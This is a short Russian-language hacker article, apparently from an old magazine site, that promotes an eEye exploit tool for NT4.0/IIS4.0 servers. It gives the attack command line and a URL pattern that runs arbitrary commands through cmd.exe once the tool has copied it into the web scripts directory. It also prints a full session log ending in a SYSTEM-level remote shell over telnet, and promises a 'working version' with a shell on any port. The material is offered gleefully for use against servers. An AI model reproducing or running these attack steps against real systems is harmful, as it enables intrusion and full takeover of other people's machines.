Привет перцы!

Парни из команды Eeye снова подарили нам
чумовой експлойт на IIS4.0. Если target сервак
работает под NT4.0+IIS4.0+SP6a, то его можно поиметь
и, соответственно, порулить им. Сей exploit
довольно свеж, но это demo версия.
Атакуем :
iishack1.5.exe www.deadserver.com 80 2323

1. При атаке IIS умирает до перезапуска
сервака.
2. После атаки в каталоге scripts удаленного
сервера появляется два файла eeyehack.exe &
eeyerulez.asp, поясняю eeyehack.exe - это ничто иное как
переименованный cmd. Что это значит? Это
значит вперед и с песней...

www.deadserver.com/scripts/eeyehack.exe /c any_command_here

В реале это работает так...(не демо):

C:\>iishack1.5.exe www.i_love_this_game.com 80 6969
Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.i_love_this_game.com on port 6969 and you should
get a cmd prompt.
C:\>telnet  www.i_love_this_game.com 6969
Trying  www.i_love_this_game.com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM

Если тебе понравилось сие представление,
напиши мне, и в следующей статье я выложу
рабочую версию, которая дает долгожданный
шелл на любой порт ака ncx...

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии